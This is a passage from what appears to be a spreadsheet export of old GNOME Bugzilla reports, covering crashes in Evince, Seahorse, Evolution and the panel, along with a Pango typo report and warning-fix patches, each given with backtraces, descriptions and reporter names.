[listener_check_activation] gs-listener-dbus.c:272 (13:45:51):   Trying to activate
[gs_grab_get_keyboard] gs-grab-x11.c:166 (13:45:51):     Grabbing keyboard widget=3F
[gs_grab_get_mouse] gs-grab-x11.c:192 (13:45:51):        Grabbing mouse widget=3F
[gs_fade_set_active] gs-fade.c:500 (13:45:51):   Setting fade: ON
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (13:45:51):   Idle 18
seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (13:45:51):         checking wall
clock for hibernation changed: 0:00:00
[gs_fade_set_active] gs-fade.c:500 (13:45:52):   Setting fade: OFF
[window_map_cb] gs-manager.c:906 (13:45:52):     Handling window map event
[gs_window_clear] gs-window-x11.c:220 (13:45:52):        Clearing window
[clear_all_children] gs-window-x11.c:201 (13:45:52):     Clearing all child windows
[window_show_cb] gs-manager.c:959 (13:45:52):    Handling window show
[gs_watcher_set_active] gs-watcher-x11.c:764 (13:45:53):         turning
watcher: OFF
[_gs_watcher_set_active_internal] gs-watcher-x11.c:747 (13:45:53):      
Stopping idle watcher
[_gs_watcher_set_session_idle] gs-watcher-x11.c:546 (13:45:53):  Changing idle
state: 1
[gs_window_xevent] gs-window-x11.c:439 (13:45:53):       not raising our
windows[window_map_event_cb] gs-manager.c:893 (13:45:53):       Handling window
map_event event
[xorg_lock_smasher_set_active] gs-grab-x11.c:109 (13:45:53):     Disabling the
x.org grab smasher
[xorg_lock_smasher_set_active] gs-grab-x11.c:128 (13:45:53):    
XF86MiscSetGrabKeysState(off) returned MiscExtGrabStateSuccess
[gs_grab_move_keyboard] gs-grab-x11.c:328 (13:45:53):    Moving keyboard grab
from 3F to 1600144
[gs_grab_move_keyboard] gs-grab-x11.c:335 (13:45:53):    *** doing X server
grab[gs_grab_release_keyboard] gs-grab-x11.c:218 (13:45:53):         Ungrabbing
keyboard
[gs_grab_get_keyboard] gs-grab-x11.c:166 (13:45:53):     Grabbing keyboard
widget=1600144
[gs_grab_move_keyboard] gs-grab-x11.c:357 (13:45:53):    *** releasing X server grab
[gs_grab_move_mouse] gs-grab-x11.c:274 (13:45:53):       Moving pointer grab
from 3F to 1600144
[gs_grab_move_mouse] gs-grab-x11.c:281 (13:45:53):       *** doing X server
grab[gs_grab_release_mouse] gs-grab-x11.c:236 (13:45:53):    Ungrabbing pointer
[gs_grab_get_mouse] gs-grab-x11.c:192 (13:45:53):        Grabbing mouse
widget=1600144
[gs_grab_move_mouse] gs-grab-x11.c:304 (13:45:53):       *** releasing X server grab
[nice_process] gs-job.c:552 (13:45:53):  Setting child process priority to: 10
[gs_window_xevent] gs-window-x11.c:439 (13:45:53):       not raising our
windows[window_map_event_cb] gs-manager.c:893 (13:45:53):       Handling window
map_event event
[xorg_lock_smasher_set_active] gs-grab-x11.c:109 (13:45:53):     Disabling the
x.org grab smasher
[xorg_lock_smasher_set_active] gs-grab-x11.c:128 (13:45:53):    
XF86MiscSetGrabKeysState(off) returned MiscExtGrabStateAlready
[gs_grab_move_keyboard] gs-grab-x11.c:321 (13:45:53):    Window 1600144 is
already grabbed skipping
[gs_grab_move_mouse] gs-grab-x11.c:262 (13:45:53):       Window 1600144 is
already grabbed skipping
(gnome-screensaver:32611): gnome-screensaver-WARNING **: Cannot restart active job.
[gs_window_xevent] gs-window-x11.c:451 (13:45:53):       not raising our
windows[gs_window_xevent] gs-window-x11.c:451 (13:45:53):       not raising our
windows[gs_window_request_unlock] gs-window-x11.c:994 (13:45:55):      
Requesting unlock
[gs_grab_release_keyboard_and_mouse] gs-grab-x11.c:384 (13:45:55):      
Releasing all grabs
[gs_grab_release_mouse] gs-grab-x11.c:236 (13:45:55):    Ungrabbing pointer
[gs_grab_release_keyboard] gs-grab-x11.c:218 (13:45:55):         Ungrabbing keyboard
[xorg_lock_smasher_set_active] gs-grab-x11.c:107 (13:45:55):     Enabling the
x.org grab smasher
[xorg_lock_smasher_set_active] gs-grab-x11.c:128 (13:45:55):    
XF86MiscSetGrabKeysState(on) returned MiscExtGrabStateSuccess
[window_unmap_cb] gs-manager.c:913 (13:45:55):   window unmapped!
[gs_window_dialog_finish] gs-window-x11.c:790 (13:45:55):        Dialog
finished[gs_watcher_set_active] gs-watcher-x11.c:764 (13:45:55):         turning
watcher: ON
[_gs_watcher_notice_activity] gs-watcher-x11.c:565 (13:45:55):   Activity
detected: resetting timers
[watcher_idle_cb] gs-monitor.c:110 (13:45:55):   Idle signal detected: 0
[gs_listener_set_session_idle] gs-listener-dbus.c:364 (13:45:55):        Setting
session idle: 0
[listener_check_activation] gs-listener-dbus.c:257 (13:45:55):   Checking for
activation
[_gs_watcher_set_session_idle] gs-watcher-x11.c:546 (13:45:55):  Changing idle
state: 0
[add_idle_timer] gs-watcher-x11.c:474 (13:45:55):        starting idle_timer
(290000 188)
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (13:45:55):   Idle 0
seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (13:45:55):         checking wall
clock for hibernation changed: 0:00:00
[_gs_watcher_set_active_internal] gs-watcher-x11.c:751 (13:45:55):      
Starting idle watcher
[_gs_watcher_notice_activity] gs-watcher-x11.c:565 (13:45:57):   Activity
detected: resetting timers
[remove_idle_timer] gs-watcher-x11.c:461 (13:45:57):     killing idle_timer 
(300000 188)
[add_idle_timer] gs-watcher-x11.c:474 (13:45:57):        starting idle_timer
(290000 190)
btlee@southstar ~ $</t>
  </si>
  <si>
    <t>btlee</t>
  </si>
  <si>
    <t>TOMBOY-343840</t>
  </si>
  <si>
    <t>Warning fixes</t>
  </si>
  <si>
    <t>Attached is a patch that fixes several warnings in libtomboy (C) and Tomboy (C#). The only critical fix is to libtomboy/tomboyutil.h where the inclusion guards are wrong so there may be problems when including both tomboyutil.h and tomboykeybinder.h.
Most of the fixes to the C# portion change the obsolete import of Mono.Posix.Catalog to Mono.Unix.Catalog.</t>
  </si>
  <si>
    <t>srittau</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-474966</t>
  </si>
  <si>
    <t>Assistive Technologies can be started but not stopped</t>
  </si>
  <si>
    <t>There are two start buttons by the Assistive Technology Preferences but once you start one of these the start button is still there and there is no stop button... That's not really problematic (except as a matter of logic) for the on screen keyboard because this can be easily closed. However it's weird for the screenreader because it's difficult for the novice user to see how to stop the thing.</t>
  </si>
  <si>
    <t>mdke</t>
  </si>
  <si>
    <t>GSTREAMER-133631</t>
  </si>
  <si>
    <t>gst-launch seg faults in gst_caps_free with no sink</t>
  </si>
  <si>
    <t>When trying to run the following pipeline gst-launch Segmentation faults
gst-launch-0.7 filesrc location=/home/andrew/Blindspott\ -\ Phlex.ogg ! spider
where
./bin/gst-launch-0.7 filesrc location=/home/andrew/Blindspott\ -\ Phlex.ogg
! vorbisfile
runs through fine.</t>
  </si>
  <si>
    <t>zxombie</t>
  </si>
  <si>
    <t>GTK+-308953</t>
  </si>
  <si>
    <t>possible leaks of cairo contexts</t>
  </si>
  <si>
    <t>These are from a cursory manual inspection as I wasn't sure how to excercise
these parts of the code off hand.</t>
  </si>
  <si>
    <t>PANGO-377975</t>
  </si>
  <si>
    <t>bug in _pango_glyph_item_iter_next_cluster</t>
  </si>
  <si>
    <t>I first figured I don't understand how this part of the code works.  Lots of debugging revealed that there's in fact a typo:
          if (item-&gt;offset + glyphs-&gt;log_clusters[glyph_index] &gt;= iter-&gt;start_index)
            {
              iter-&gt;end_index = item-&gt;offset + glyphs-&gt;log_clusters[glyph_index]
              iter-&gt;end_char += g_utf8_strlen (iter-&gt;text + iter-&gt;start_index
                                               iter-&gt;end_index - iter-&gt;start_index)
              break
            }
So when looking for the end of the cluster &gt;= should actually be replaced with !=.  In both branches.</t>
  </si>
  <si>
    <t>behdad</t>
  </si>
  <si>
    <t>EVINCE-340956</t>
  </si>
  <si>
    <t>Crash related to theme changes and attachments</t>
  </si>
  <si>
    <t>Evince suddenly crashed. The window wasn't even active nor visible!
Backtrace was generated from '/opt/gnome/bin/evince'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1229269312 (LWP 26540)]
[New Thread -1231893584 (LWP 26541)]
0xb72a0221 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#0  0xb72a0221 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0xb7f628a5 in libgnomeui_segv_handle (signum=-512) at gnome-ui-init.c:792
#2  
#3  0x0807a60c in ev_attachment_bar_update_icons (ev_attachbar=0x89f88e8 
    user_data=0x81b4f58) at ev-attachment-bar.c:153
#4  0xb73573eb in IA__g_cclosure_marshal_VOID__VOID (closure=0x89fa168 
    return_value=0x0 n_param_values=1 param_values=0xbfeabb3c 
    invocation_hint=0xbfeaba2c marshal_data=0x807a5f0) at gmarshal.c:77
#5  0xb7349449 in IA__g_closure_invoke (closure=0x89fa168 
    return_value=0xaaaaaaaa n_param_values=2863311530 
    param_values=0xaaaaaaaa invocation_hint=0xaaaaaaaa) at gclosure.c:490
#6  0xb735a7ca in signal_emit_unlocked_R (node=0x81fe2f0 detail=0 
    instance=0x81b4f58 emission_return=0x0 instance_and_params=0xbfeabb3c)
    at gsignal.c:2438
#7  0xb735c35b in IA__g_signal_emit_valist (instance=0x81b4f58 
    signal_id=255 detail=0 var_args=) at gsignal.c:2197
#8  0xb735c6a9 in IA__g_signal_emit (instance=0xaaaaaaaa 
    signal_id=2863311530 detail=2863311530) at gsignal.c:2241
#9  0xb760c83a in do_theme_change (icon_theme=0x81b4f58) at gtkicontheme.c:617
#10 0xb760e509 in IA__gtk_icon_theme_rescan_if_needed (icon_theme=0x81b4f58)
    at gtkicontheme.c:1711
#11 0xb760f857 in ensure_valid_themes (icon_theme=0x81b4f58)
    at gtkicontheme.c:1178
#12 0xb760f992 in _gtk_icon_theme_check_reload (display=0x80e00e8)
    at gtkicontheme.c:3035
#13 0xb778c12f in gtk_window_client_event (widget=0x8105050 event=0x8a070c0)
    at gtkwindow.c:4839
#14 0xb7648294 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80fdd48 
    return_value=0xbfeac130 n_param_values=2 param_values=0xbfeac22c 
    invocation_hint=0xbfeac11c marshal_data=0xb778c0d0) at gtkmarshalers.c:83
#15 0xb7348d89 in g_type_class_meta_marshal (closure=0x80fdd48 
    return_value=0xaaaaaaaa n_param_values=2863311530 
    param_values=0xbfeac22c invocation_hint=0xaaaaaaaa 
    marshal_data=0xaaaaaaaa) at gclosure.c:567
#16 0xb7349449 in IA__g_closure_invoke (closure=0x80fdd48 
    return_value=0xaaaaaaaa n_param_values=2863311530 
    param_values=0xaaaaaaaa invocation_hint=0xaaaaaaaa) at gclosure.c:490
#17 0xb735af45 in signal_emit_unlocked_R (node=0x80fdd98 detail=0 
    instance=0x8105050 emission_return=0xbfeac3ec 
    instance_and_params=0xbfeac22c) at gsignal.c:2476
#18 0xb735c0b1 in IA__g_signal_emit_valist (instance=0x8105050 signal_id=88 
    detail=0 
    var_args=0xbfeac470 \210Ã„ÃªÂ¿Ã€p \bPP\020\b}\200wÂ·PP\020\bX\205\v\b)
    at gsignal.c:2207
#19 0xb735c6a9 in IA__g_signal_emit (instance=0xaaaaaaaa 
    signal_id=2863311530 detail=2863311530) at gsignal.c:2241
#20 0xb7777e14 in gtk_widget_event_internal (widget=0x8105050 
    event=0x8a070c0) at gtkwidget.c:3767
#21 0xb76465ae in IA__gtk_main_do_event (event=0x8a070c0) at gtkmain.c:1440
#22 0xb74b5a0a in gdk_event_dispatch (source=0xaaaaaaaa callback=0 
    user_data=0x0) at gdkevents-x11.c:2314
#23 0xb72d25fc in IA__g_main_context_dispatch (context=0x80e6e38)
    at gmain.c:1916
#24 0xb72d5a8b in g_main_context_iterate (context=0x80e6e38 block=1 
    dispatch=1 self=0x80b4978) at gmain.c:2547
#25 0xb72d5de7 in IA__g_main_loop_run (loop=0x83b13f0) at gmain.c:2751
#26 0xb7645861 in IA__gtk_main () at gtkmain.c:999
#27 0x0807b4d8 in main (argc=136007512 argv=0x81b4f58) at main.c:295</t>
  </si>
  <si>
    <t>SEAHORSE-147076</t>
  </si>
  <si>
    <t>seahorse crashs at start</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Mandrake Linux release 9.1 (Bamboo) for i586
Package: seahorse
Severity: normal
Version: GNOME2.6.2 0.7.3
Gnome-Distributor: GARNOME
Synopsis: seahorse crashs at start
Bugzilla-Product: seahorse
Bugzilla-Component: general
Bugzilla-Version: 0.7.3
BugBuddy-GnomeVersion: 2.0 (2.6.1.1)
Description:
Description of the crash:
Steps to reproduce the crash:
1. 
2. 
3. 
Expected Results:
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/local/gnome2.6.1/bin/seahorse'
[New Thread 16384 (LWP 3754)]
0x40b77677 in waitpid () from /lib/i686/libpthread.so.0
#0  0x40b77677 in waitpid () from /lib/i686/libpthread.so.0
#1  0x4012ecaa in libgnomeui_segv_handle (signum=-512) at
gnome-ui-init.c:741
#2  0x40b765ce in __pthread_sighandler () from
/lib/i686/libpthread.so.0
#3  0x40d6d3b8 in __libc_sigaction () from /lib/i686/libc.so.6
#4  0x08053f62 in set_toolbar_style (toolbar=0x80abc78 style=0x401a4174
\213]ÃƒÂ¼\211ÃƒÂ¬]ÃƒÂƒÃƒÂ‡D$\020ÃƒÂ¾\001) at seahorse-key-manager.c:354
#5  0x0805472e in seahorse_key_manager_show (sctx=0x80a25a8) at
seahorse-key-manager.c:557
#6  0x0804f39c in main (argc=0 argv=0x0) at main.c:206
#7  0x40d5a7f7 in __libc_start_main () from /lib/i686/libc.so.6
Thread 1 (Thread 16384 (LWP 3754)):
#0  0x40b77677 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#1  0x4012ecaa in libgnomeui_segv_handle (signum=-512) at
gnome-ui-init.c:741
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} sa_mask
= {__val = {1088900944 3221221912 1085767840 1088903584 136336912
3221221992 1086765185 
      0 3758096385 1 1 113 0 0 1085778904 0 3758096384 1
1086840684 134853368 0 1085755291 1085778904 134853368 0
3221221992 1085742780 134668672 
      1086567184 3221222008 1086473773 134668656}} sa_flags =
1086567184 sa_restorer = 0xbffff2b8}
	pid = 0
#2  0x40b765ce in __pthread_sighandler () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x40d6d3b8 in __libc_sigaction () from /lib/i686/libc.so.6
No symbol table info available.
#4  0x08053f62 in set_toolbar_style (toolbar=0x80abc78 style=0x401a4174
\213]ÃƒÂ¼\211ÃƒÂ¬]ÃƒÂƒÃƒÂ‡D$\020ÃƒÂ¾\001) at seahorse-key-manager.c:354
No locals.
#5  0x0805472e in seahorse_key_manager_show (sctx=0x80a25a8) at
seahorse-key-manager.c:557
	swidget = (SeahorseWidget *) 0x0
	view = (GtkTreeView *) 0x80abc78
	selection = (GtkTreeSelection *) 0x401a4174
	widget = (GtkWidget *) 0x401a4174
	visible = 134921336
#6  0x0804f39c in main (argc=0 argv=0x0) at main.c:206
	sctx = (SeahorseContext *) 0x80a25a8
	err = 134607500
	new_path = (gchar *) 0x40012780 ÃƒÂ¸-\001@A
#7  0x40d5a7f7 in __libc_start_main () from /lib/i686/libc.so.6
No symbol table info available.
#0  0x40b77677 in waitpid () from /lib/i686/libpthread.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-07-09 11:45 -------
Unknown version 0.7.3 in product seahorse. Setting version to 0.6.x.
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product seahorse.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was valery.bruniaux@ifrance.com.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>valery.bruniaux</t>
  </si>
  <si>
    <t>GNOME-CORE-53211</t>
  </si>
  <si>
    <t>Started pilot_applet and panel died</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.4
Synopsis: Started pilot_applet and panel died
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.4.3 i586 unknown
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.6
gnome-libs: gnome-libs 1.2.11
libxml: 1.8.10
gnome-core: gnome-core 1.2.4
Description:
I started pilot_applet (some applet for gnome-pilot) as a root and
panel was 
running as normal user. Panel crashed. A window titled Question
appeared
 but was empty.
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
0x405f2869 in __wait4 () from /lib/libc.so.6
#0  0x405f2869 in __wait4 () from /lib/libc.so.6
#1  0x4065e1c8 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4015923a in gnome_segv_handle (signum=11) at gnome-init.c:660
#3  
#4  0x8057fff in size_change ()
#5  0x8079156 in load_queued_externs ()
#6  0x4002c603 in _ORBIT_skel_GNOME_PanelSpot_register_us ()
   from /usr/lib/libpanel_applet.so.0
#7  0x4005d364 in ORBit_POA_handle_request (recv_buffer=0x8141188 
    poa=0x813c450) at orbit_poa.c:507
#8  0x4005f56e in ORBit_handle_incoming_request (recv_buffer=0x8141188)
    at server.c:89
#9  0x4005f795 in ORBit_handle_incoming_message (recv_buffer=0x8141188)
    at server.c:159
#10 0x40076420 in giop_main_handle_connection (connection=0x81645d8)
    at connection.c:1211
#11 0x400e841d in orb_handle_connection (source=0x81ff1a8 cond=G_IO_IN 
    cnx=0x81645d8) at orbitgtk.c:44
#12 0x400921a0 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#13 0x40093987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#14 0x40094001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#15 0x400941cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#16 0x402a2f87 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#17 0x8056082 in main ()
#18 0x4055db5c in __libc_start_main (main=0x8055d70  argc=1 
    ubp_av=0xbffff7ac init=0x8053370  fini=0x8093b5c  
    rtld_fini=0x4000d634  stack_end=0xbffff7a4)
    at ../sysdeps/generic/libc-start.c:129
#0  0x405f2869 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4065e1c8 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4015923a in gnome_segv_handle (signum=11) at gnome-init.c:660
in_segv.5 = 1
pid = 0
estatus = 136276984
buf =  l%\b`Ã²Ã¿Â¿\020Ae@iÃ±Ã¿Â¿j\ne@pÃ²Ã¿Â¿ÃˆÃ¡e@AÃžU@
#3  
No locals.
#4  0x8057fff in size_change ()
No symbol table info available.
#5  0x8079156 in load_queued_externs ()
No symbol table info available.
#6  0x4002c603 in _ORBIT_skel_GNOME_PanelSpot_register_us ()
   from /usr/lib/libpanel_applet.so.0
No symbol table info available.
#7  0x4005d364 in ORBit_POA_handle_request (recv_buffer=0x8141188 
    poa=0x813c450) at orbit_poa.c:507
servant = (PortableServer_ServantBase *) 0x81642d0
cookie = 0xbffff520
obj_impl = (ORBit_POAObject *) 0x825a278
tmp_obj_impl = {object_id = 0x90 servant = 0x90 poa = 0x4065c680 
  orb = 0x813c450 objnum = 135532936 rand_data = Ã˜E\026\bPÃµÃ¿Â¿}
skel = 0
imp = 0x8079080
ev = {_major = CORBA_NO_EXCEPTION _repo_id = 0x0 _params = 0x0 _any = 0x0}
send_buffer = (GIOPSendBuffer *) 0xbffff508
opname = (guchar *) 0x81642d0 ÃˆÃ†e@XÂ½#\b
oid = (PortableServer_ObjectId *) 0x8232b38
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-04-14 19:36 -------
The original reporter (ville.ranki@tut.fi) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>ville.ranki</t>
  </si>
  <si>
    <t>GNOME-PANEL-117385</t>
  </si>
  <si>
    <t>Panel should depend on gconf &gt;2.3.1</t>
  </si>
  <si>
    <t>Since 2003-03-13 the --load option is implemented in gconf soon after that version 2.3.1 has been released. Since 2003-07-01 gnome-panel makes use of it. As of 2003-07-14 gnome-panel depends on GConf 2.3.0 - this should be pushed to 2.3.1.
regs
 Chris</t>
  </si>
  <si>
    <t>EVOLUTION-214689</t>
  </si>
  <si>
    <t>Calander crash when adding appointment</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.99.1
Synopsis: Calander crash when adding appointment
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Description:
Had selected a time window covering 4 units in the calander. Added the
information - one line of text and went to the calander with the dates
to change the date shown. Application hung. 
Told Evolution to close which brought up the application calander
crashed box - link to bug buddy and here it is.
Debugging Information:
[New Thread 1024 (LWP 16433)]
0x40bafc09 in __wait4 () from /lib/libc.so.6
#0  0x40bafc09 in __wait4 () from /lib/libc.so.6
#1  0x40c2bfd0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x407d58de in waitpid (pid=19015 stat_loc=0xbfffe0dc options=0)
    at wrapsyscall.c:172
#3  0x4030a262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x407d34c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135744048 esi = 135482112 ebp = 3221218584 esp = 3221218432 ebx = 1084432540 edx = 135875336 ecx = 4 eax = 0 trapno = 14 err = 4 eip = 1084207453 cs = 35 __csh = 0 eflags = 66050 esp_at_signal = 3221218432 ss = 43 __ssh = 0 fpstate = 0xbfffe200 oldmask = 2147483648 cr2 = 12})
    at signals.c:97
#5  
#6  0x409fb15d in bonobo_plug_set_focus (window=0x8134b00 focus=0x8174a30)
    at bonobo-plug.c:492
#7  0x404b3c6d in gtk_marshal_NONE__POINTER (object=0x8134b00 
    func=0x409fb094  func_data=0x0 args=0xbfffe5d0)
    at gtkmarshal.c:193
#8  0x404e28fb in gtk_signal_real_emit (object=0x8134b00 signal_id=96 
    params=0xbfffe5d0) at gtksignal.c:1492
#9  0x404e0930 in gtk_signal_emit (object=0x8134b00 signal_id=96)
    at gtksignal.c:552
#10 0x4051d954 in gtk_window_set_focus (window=0x8134b00 focus=0x8174a30)
    at gtkwindow.c:447
#11 0x40518926 in gtk_widget_real_grab_focus (focus_widget=0x8174a30)
    at gtkwidget.c:3160
#12 0x404b3d4b in gtk_marshal_NONE__NONE (object=0x8174a30 
    func=0x40518728  func_data=0x0 
    args=0xbfffe980) at gtkmarshal.c:312
#13 0x404e28fb in gtk_signal_real_emit (object=0x8174a30 signal_id=40 
    params=0xbfffe980) at gtksignal.c:1492
#14 0x404e0930 in gtk_signal_emit (object=0x8174a30 signal_id=40)
    at gtksignal.c:552
#15 0x405186c0 in gtk_widget_grab_focus (widget=0x8174a30) at gtkwidget.c:3076
#16 0x0808c598 in e_day_view_on_text_item_event (item=0x81cc0a8 
    event=0xbffff030 day_view=0x8174a30) at e-day-view.c:5562
#17 0x402c986d in gnome_canvas_item_marshal_signal_1 (object=0x81cc0a8 
    func=0x808c550  func_data=0x8174a30 
    args=0xbfffed60) at gnome-canvas.c:543
#18 0x404e346a in gtk_handlers_run (handlers=0x8188a68 signal=0xbfffecf0 
    object=0x81cc0a8 params=0xbfffed60 after=0) at gtksignal.c:1917
#19 0x404e28bb in gtk_signal_real_emit (object=0x81cc0a8 signal_id=130 
    params=0xbfffed60) at gtksignal.c:1477
#20 0x404e0cbf in gtk_signal_emit_by_name (object=0x81cc0a8 
    name=0x4015398f event) at gtksignal.c:618
#21 0x400cd300 in emit_event (canvas=0x8173728 event=0xbffff0c0)
    at e-canvas.c:276
#22 0x400cd45a in e_canvas_key (widget=0x8173728 event=0x81b27b8)
    at e-canvas.c:307
#23 0x404b3b21 in gtk_marshal_BOOL__POINTER (object=0x8173728 
    func=0x400cd388  func_data=0x0 args=0xbffff1f0)
    at gtkmarshal.c:28
#24 0x404e28fb in gtk_signal_real_emit (object=0x8173728 signal_id=48 
    params=0xbffff1f0) at gtksignal.c:1492
#25 0x404e0930 in gtk_signal_emit (object=0x8173728 signal_id=48)
    at gtksignal.c:552
#26 0x40517de8 in gtk_widget_event (widget=0x8173728 event=0x81b27b8)
    at gtkwidget.c:2864
#27 0x409fa861 in bonobo_plug_key_press_event (widget=0x8134b00 
    event=0x81b27b8) at bonobo-plug.c:273
#28 0x404b3b21 in gtk_marshal_BOOL__POINTER (object=0x8134b00 
    func=0x409fa6c8  func_data=0x0 
    args=0xbffff5b0) at gtkmarshal.c:28
#29 0x404e28fb in gtk_signal_real_emit (object=0x8134b00 signal_id=48 
    params=0xbffff5b0) at gtksignal.c:1492
#30 0x404e0930 in gtk_signal_emit (object=0x8134b00 signal_id=48)
    at gtksignal.c:552
#31 0x40517de8 in gtk_widget_event (widget=0x8134b00 event=0x81b27b8)
    at gtkwidget.c:2864
#32 0x404b3a1c in gtk_propagate_event (widget=0x8173728 event=0x81b27b8)
    at gtkmain.c:1360
#33 0x404b2c55 in gtk_main_do_event (event=0x81b27b8) at gtkmain.c:818
#34 0x4056c16b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff980 user_data=0x0) at gdkevents.c:2139
#35 0x4059d055 in g_main_dispatch (dispatch_time=0xbffff980) at gmain.c:656
#36 0x4059d659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#37 0x4059d7e8 in g_main_run (loop=0x8133128) at gmain.c:935
#38 0x404b255b in gtk_main () at gtkmain.c:524
#39 0x4093155f in bonobo_main () at bonobo-main.c:283
#40 0x080ad527 in main (argc=3 argv=0xbffffa74) at main.c:156
#41 0x40b18306 in __libc_start_main (main=0x80ad484  argc=3 
    ubp_av=0xbffffa74 init=0x8066d04  fini=0x80e655c  
    rtld_fini=0x4000d2cc  stack_end=0xbffffa6c)
    at ../sysdeps/generic/libc-start.c:129
Thread 1 (Thread 1024 (LWP 16433)):
#0  0x40bafc09 in __wait4 () from /lib/libc.so.6
#1  0x40c2bfd0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x407d58de in waitpid (pid=19015 stat_loc=0xbfffe0dc options=0)
    at wrapsyscall.c:172
#3  0x4030a262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x407d34c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135744048 esi = 135482112 ebp = 3221218584 esp = 3221218432 ebx = 1084432540 edx = 135875336 ecx = 4 eax = 0 trapno = 14 err = 4 eip = 1084207453 cs = 35 __csh = 0 eflags = 66050 esp_at_signal = 3221218432 ss = 43 __ssh = 0 fpstate = 0xbfffe200 oldmask = 2147483648 cr2 = 12})
    at signals.c:97
#5  
#6  0x409fb15d in bonobo_plug_set_focus (window=0x8134b00 focus=0x8174a30)
    at bonobo-plug.c:492
#7  0x404b3c6d in gtk_marshal_NONE__POINTER (object=0x8134b00 
    func=0x409fb094  func_data=0x0 args=0xbfffe5d0)
    at gtkmarshal.c:193
#8  0x404e28fb in gtk_signal_real_emit (object=0x8134b00 signal_id=96 
    params=0xbfffe5d0) at gtksignal.c:1492
#9  0x404e0930 in gtk_signal_emit (object=0x8134b00 signal_id=96)
    at gtksignal.c:552
#10 0x4051d954 in gtk_window_set_focus (window=0x8134b00 focus=0x8174a30)
    at gtkwindow.c:447
#11 0x40518926 in gtk_widget_real_grab_focus (focus_widget=0x8174a30)
    at gtkwidget.c:3160
#12 0x404b3d4b in gtk_marshal_NONE__NONE (object=0x8174a30 
    func=0x40518728  func_data=0x0 
    args=0xbfffe980) at gtkmarshal.c:312
#13 0x404e28fb in gtk_signal_real_emit (object=0x8174a30 signal_id=40 
    params=0xbfffe980) at gtksignal.c:1492
#14 0x404e0930 in gtk_signal_emit (object=0x8174a30 signal_id=40)
    at gtksignal.c:552
#15 0x405186c0 in gtk_widget_grab_focus (widget=0x8174a30) at gtkwidget.c:3076
#16 0x0808c598 in e_day_view_on_text_item_event (item=0x81cc0a8 
    event=0xbffff030 day_view=0x8174a30) at e-day-view.c:5562
#17 0x402c986d in gnome_canvas_item_marshal_signal_1 (object=0x81cc0a8 
    func=0x808c550  func_data=0x8174a30 
    args=0xbfffed60) at gnome-canvas.c:543
#18 0x404e346a in gtk_handlers_run (handlers=0x8188a68 signal=0xbfffecf0 
    object=0x81cc0a8 params=0xbfffed60 after=0) at gtksignal.c:1917
#19 0x404e28bb in gtk_signal_real_emit (object=0x81cc0a8 signal_id=130 
    params=0xbfffed60) at gtksignal.c:1477
#20 0x404e0cbf in gtk_signal_emit_by_name (object=0x81cc0a8 
    name=0x4015398f event) at gtksignal.c:618
#21 0x400cd300 in emit_event (canvas=0x8173728 event=0xbffff0c0)
    at e-canvas.c:276
#22 0x400cd45a in e_canvas_key (widget=0x8173728 event=0x81b27b8)
    at e-canvas.c:307
#23 0x404b3b21 in gtk_marshal_BOOL__POINTER (object=0x8173728 
    func=0x400cd388  func_data=0x0 args=0xbffff1f0)
    at gtkmarshal.c:28
#24 0x404e28fb in gtk_signal_real_emit (object=0x8173728 signal_id=48 
    params=0xbffff1f0) at gtksignal.c:1492
#25 0x404e0930 in gtk_signal_emit (object=0x8173728 signal_id=48)
    at gtksignal.c:552
#26 0x40517de8 in gtk_widget_event (widget=0x8173728 event=0x81b27b8)
    at gtkwidget.c:2864
#27 0x409fa861 in bonobo_plug_key_press_event (widget=0x8134b00 
    event=0x81b27b8) at bonobo-plug.c:273
